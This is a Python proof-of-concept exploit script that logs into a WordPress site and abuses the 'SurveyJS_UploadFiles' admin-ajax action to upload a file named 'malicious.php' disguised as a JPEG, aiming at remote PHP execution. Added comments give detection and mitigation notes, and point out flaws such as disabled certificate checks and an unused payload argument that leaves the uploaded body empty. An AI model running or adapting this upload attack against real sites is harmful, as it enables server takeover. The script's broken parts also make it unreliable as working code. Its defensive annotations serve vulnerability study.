# Proof-of-concept client for an authenticated file upload through the
# `SurveyJS_UploadFiles` admin-ajax action of a WordPress site.
#
# Reviewer notes (defensive reading of what this script sends):
#   * The upload is a multipart POST to /wp-admin/admin-ajax.php whose file part
#     is named `malicious.php` but declared as `image/jpeg`. A handler that
#     trusts the client-supplied content type, or does not check the extension,
#     would store a server-executable file. The handler itself is not shown here.
#   * Detection: look for POSTs to admin-ajax.php carrying
#     action=SurveyJS_UploadFiles where the uploaded filename has a script
#     extension or the declared type does not match it, and for new .php files
#     in the directory that handler writes to.
#   * Mitigation: update the plugin that registers this action, enforce an
#     extension/content allowlist server-side, and disable script execution in
#     upload directories.
import argparse
import json

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Certificate verification is turned off on every request below; this only
# silences the resulting warning. Credentials therefore travel over a
# connection whose peer is never validated.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def upload_file(url, username, password, php_code):
    """Log in to the WordPress site at *url* and post one file to admin-ajax.

    Args:
        url: Base URL of the site, used as a prefix without normalisation.
        username: WordPress account name submitted to wp-login.php.
        password: Password for that account.
        php_code: Accepted but never read in this copy of the script; the
            uploaded file body is an empty string (presumably the original
            template was lost when the page was extracted).

    Returns:
        None. Progress and the server's reply are printed to stdout.
    """
    http = requests.Session()

    # Field order mirrors the standard wp-login.php form.
    credentials = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{url}/wp-admin/",
        'testcookie': '1',
    }
    http.post(f"{url}/wp-login.php", data=credentials, verify=False)

    # Success is inferred only from the presence of an auth cookie in the jar,
    # not from the login response itself.
    authenticated = any(
        'wordpress_logged_in' in jar_entry.name for jar_entry in http.cookies
    )
    if not authenticated:
        print("Login failed. Check your credentials.")
        return

    print("Login successful.")

    # Extension and declared MIME type deliberately disagree; the file body is
    # empty in this copy.
    multipart = {
        'action': (None, 'SurveyJS_UploadFiles'),
        'file': ('malicious.php', '', 'image/jpeg'),
    }
    reply = http.post(
        f"{url}/wp-admin/admin-ajax.php", files=multipart, verify=False
    )

    if reply.status_code != 200:
        print("Failed to upload file. Status code:", reply.status_code)
        return

    # HTTP 200 alone does not prove the file was stored; admin-ajax can answer
    # 200 for rejected or unknown actions as well.
    print("File uploaded successfully.")
    try:
        parsed = reply.json()
        # NOTE(review): a JSON body without this key raises KeyError, which is
        # not caught here.
        print(parsed["malicious.php"])
    except json.JSONDecodeError:
        print("Failed to parse JSON response.")
        print("Response text:", reply.text)


if __name__ == "__main__":
    # NOTE(review): the password is a positional CLI argument, so it ends up in
    # shell history and is visible in the process list while the script runs.
    cli = argparse.ArgumentParser(
        description='Upload a PHP file to a WordPress site.'
    )
    cli.add_argument(
        'url',
        type=str,
        help='The URL of the WordPress site (e.g., http://example.com)',
    )
    cli.add_argument('username', type=str, help='Your WordPress username')
    cli.add_argument('password', type=str, help='Your WordPress password')
    cli.add_argument(
        '--code',
        type=str,
        default='Arbitrary PHP code execution',
        help='PHP code to execute',
    )
    opts = cli.parse_args()

    upload_file(opts.url, opts.username, opts.password, opts.code)